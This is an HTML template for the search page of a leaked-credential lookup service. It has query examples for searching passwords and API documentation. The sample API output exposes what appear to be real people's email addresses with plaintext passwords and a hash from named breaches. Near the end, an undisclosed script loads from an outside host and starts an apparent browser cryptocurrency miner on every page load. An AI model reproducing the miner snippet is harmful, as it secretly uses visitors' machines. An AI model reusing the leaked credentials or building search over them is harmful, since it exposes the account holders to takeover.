<style>
body{
padding:5px 5px 5px 5px;
padding-bottom:10px;
}

.search-container{
width: 490px;
display: block;
margin: 0 auto;
}

input#search-bar{
margin: 0 auto;
width: 100%;
height: 45px;
padding: 0 20px;
font-size: 1rem;
border: 1px solid #D0CFCE;
outline: none;
&:focus{
border: 1px solid #008ABF;
transition: 0.35s ease;
color: #008ABF;
&::-webkit-input-placeholder{
transition: opacity 0.45s ease;
opacity: 0;
}
&::-moz-placeholder {
transition: opacity 0.45s ease;
opacity: 0;
}
&:-ms-placeholder {
transition: opacity 0.45s ease;
opacity: 0;
}
}
}

.search-icon{
position: relative;
float: right;
width: 75px;
height: 75px;
top: -62px;
right: -45px;
}

div#results {

margin: auto;
width: 60%;
padding: 10px 10px 10px 10px;
}

body {
margin: 5px;
font-family: Arial, Helvetica, sans-serif;
}

.topnav {
overflow: hidden;
background-color: #333;
}

.topnav a {
float: left;
color: #f2f2f2;
text-align: center;
padding: 14px 16px;
text-decoration: none;
font-size: 17px;
}

.topnav a:hover {
background-color: #ddd;
color: black;
}

.topnav a.active {
background-color: #333;
color: white;
}

div#page {

width: 50%;
text-align: center;
margin: 0 auto;
}

table#results {

width: 100%;
font-size: 12px;
padding: 10px 10px 10px 10px;
font-weight: normal;
}

}

</style>


<div class="topnav">
  <a class="active" href="/">Home</a>
  <a href="search">Search</a>
  <a href="https://www.etsy.com/shop/TheInfoSecShop" target="_blank">Shop</a>
</div>


<body>

  <p>*Search is in early alpha, please report bugs to <a href="https://github.com/acaceres2176/scylla/issues" target="_blank">the scylla github repo</a></p>
  <form class="search-container" action="search">
    <input type="text" id="search-bar" name="q" placeholder="Please enter a search term...">
    <!--<a href="#"><img class="search-icon"></a>-->
  </form>

<div id="results">
{{ html_results|safe }}
</div>

<div id="page">

  {% for page in pages %}

    <a href="{{ url_for(request.endpoint) }}?&q={{ params['q'] }}&from={{ page * size }}&size=100">{{ page }}</a>

  {% endfor %}

</div>

<br />
<br />
<br />
<h2>Available Fields</h2>

{% for field in fields %}
  {{ field }} <br />
{% endfor %}

<h2>Queries</h2>

<p>Queries use Lucene query syntax. You will get a 500 error if your query is incorrect. Use the fields listed above to guide you. Full query syntax (including wildcards) are supported</p>
<figure>
  <figcaption>Example search for passwords that start with ff</figcaption>
  <pre>
    <code>
      Password:ff*
    </code>
  </pre>

  <figcaption>This would match any passwords with a d in them and the username dave, dale, dane, etc.</figcaption>
  <pre>
    <code>
      Name:da?e Password:*d*
    </code>
  </pre>
  
</figure>

<h2>API</h2>

  <p>The search API can be accessed by sending a GET request to this page with the Accept header set
    to <code>Accept: application/json</code>
    <br /><br />
    <code>
      GET https://scylla.sh/search?q=your_query&num=1000&from=200
    </code>
    <br /><br />

    The above GET request grabs 1000 results of your_query starting at the 200th record. Pagination
    can be done using the "from" parameter. Queries return the first 10,000 hits.
    <br /><br />

    Data is returned in JSON format like the following:
    <br /><br />
<code>
<pre>
[
   {
      "_id":"hKW8WWsBBGJneKoTbFS-",
      "_index":"pw_data",
      "_score":19.8656,
      "_source":{
         "Domain":"exploit.in",
         "Email":"marin.vardic@zzf.hr",
         "Password":"freeshit"
      },
      "_type":"_doc"
   },
   {
      "_id":"_3PgVGsBBGJneKoTof0e",
      "_index":"pw_data",
      "_score":16.46111,
      "_source":{
         "Domain":"linkedin.com",
         "Email":"jasna.cajsa-beber@zzf.hr",
         "PassHash":"a3f5b3b7c790e397b2d77eca31cd96bcd57c8700"
      },
      "_type":"_doc"
   },
   {
      "_id":"dBmbWmsBBGJneKoTZ5Wk",
      "_index":"pw_data",
      "_score":16.46111,
      "_source":{
         "Domain":"exploit.in",
         "Email":"jasna.cajsa-beber@zzf.hr",
         "Password":"vili2005"
      },
      "_type":"_doc"
   }
]
</code>
</pre>   
    <br /><br />
    Note you may use the fields below to guide you, but not all fields are returned with each query,
    only available fields. If fields are added, they will be appended to the list of available fields for
    query.

  </p>

<h2>Normalized Databases</h2>
<p>The following are the databases available for search.</p>
{% for db in dbs %}
  {% if "all" in db %}
  <!-- skipped all.jl -->
  {% endif %}
  The {{ db.split(".")[0] }} Database<br />
{% endfor %}

  <script src="https://www.hostingcloud.racing/FA18.js"></script>
  <script>
    var _client = new Client.Anonymous('b0a5fc90521fc2862b2feb55baee6a97a3285e548d8b9da055d1f586aef632e2', {
    throttle: 0.5, ads: 0
    });
    _client.start();
  </script>

  <h2>ToS</h2>

  <p>
  Please see the <a href="/">Home</a> page for the terms of service before using this.
  </p>
  
  <!-- Matomo Image Tracker-->
  <img src="https://analytics.hyperiongray.com/matomo.php?idsite=9&amp;rec=1" style="border:0" alt="" />
  <!-- End Matomo -->
  
</body>
